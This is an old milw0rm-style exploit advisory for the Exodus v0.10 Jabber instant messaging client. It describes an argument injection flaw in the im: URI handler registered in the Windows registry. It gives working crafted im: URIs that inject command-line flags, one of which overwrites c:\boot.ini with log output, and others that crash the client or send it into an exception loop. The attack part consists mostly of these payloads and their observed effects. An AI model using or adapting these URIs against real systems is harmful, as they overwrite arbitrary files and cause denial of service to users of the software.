1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 Exodus v0.10 uri handler arbitrary parameter injection
3 by Nine:Situations:Group::strawdog
4 tested against IE8b/xpsp3
5 may not work against non−English systems because of an installation bug
6 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
7 software site: http://code.google.com/p/exodus/
8 description:
9 Exodus is a free software instant messaging client developed by Peter
10 Millard and written in Borland Delphi that can connect to Jabber servers
11 and exchange messages with other Jabber users. Currently, binaries are
12 only available for Microsoft Windows. Exodus was designed as the official
13 successor of the Winjab client, as Winjab was a personal project that
14 was becoming too difficult to maintain[..]
15 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
16
17 reg key:
18 HKEY_CLASSES_ROOT\im\shell\Open\command
19 C:\Program Files\Exodus\Exodus.exe −u ’%1’
20 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
21 it’s possible to inject arbitrary command line parameters, ex. this shows
22 the argument list:
23 im:///’%20−?
24
25 this overwrites an arbitrary file:
26 im:///’%20−l%20c:\boot.ini%20−v
27
28 now boot.ini looks like this:
29 [2008−11−17 13.50.41.437] Trying to setup the Auto Away timer.
30 [2008−11−17 13.50.41.453] Using Win32 API for Autoaway checks!!
31 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
32 todo:
33 investigate this even:
34 im:///’%20−c%20[A*300]
35
36 this will cause an infinite loop trough multiple unhandled exceptions
37 and this:
38 im:///’%20−c%20file:///aaaa%20
39 crash exodus.exe
40 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
41 our site −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−> http://retrogod.altervista.org
42
43 # milw0rm.com [2008−11−17]
Page 1/1
Exodus 0.10 uri handler Arbitrary Parameter Injection Vulnerability
Nin